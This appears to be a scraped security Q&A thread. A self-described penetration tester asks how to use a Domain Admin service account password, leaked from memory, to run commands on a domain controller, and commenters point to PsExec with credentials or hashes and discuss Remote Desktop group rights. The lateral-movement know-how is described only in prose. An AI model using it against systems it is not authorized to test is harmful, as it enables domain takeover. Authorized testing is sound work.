0

I've compromised a Windows machine that leaks the password of a privileged service account ("Domain Admin") in memory (legal penetration test).

Since the account is a service account, it cannot be used to log into the machine interactively using, e.g. Remote Desktop.

Given that I have the username/password of the privileged service account, and that I have the local administrator privileges on the machine, how can I run commands as the service account against the domain controller to add a new user etc.?

user3382203
  • 11
  • 10
Shuzheng
  • 1,097
  • 4
  • 22
  • 37
  • 2
    If it is domain admin, you can use psexec – Tryna Learn Somethin Oct 10 '18 at 11:57
  • @TrynaLearnSomethin - Thank you for comment. Does it matter, where PsExec is executed from, i.e. does it need to be executed from the machine on which the service account runs? I mean, does it work? Right now, the service account can't log on using Windows Logon screen, so can it log on to the domain controller? – Shuzheng Oct 10 '18 at 12:12
  • 1
    Just be on the same network and provide to psexec ip of host to which you want to connect, username, pass or hash and what to execute. If it is domain admin, it will work like charm – Tryna Learn Somethin Oct 10 '18 at 12:19
  • @TrynaLearnSomethin - Any idea why I can't logon using this (Domain Admin) service account through Remote Desktop? – Shuzheng Oct 10 '18 at 12:38
  • Has to be added to Remote Desktop Users group in order to rdp – Tryna Learn Somethin Oct 10 '18 at 12:39
  • @TrynaLearnSomethin - But RDP actually works; I'm presented with the Windows Logon screen. Then when entering the credentials, it says that this account is not allowed to logon. Any ideas? – Shuzheng Oct 10 '18 at 12:49
  • Maybe rdp is allowed, but user has to be added in Remote Desktop Users group on that machine in order to rdp – Tryna Learn Somethin Oct 10 '18 at 12:50

0 Answers0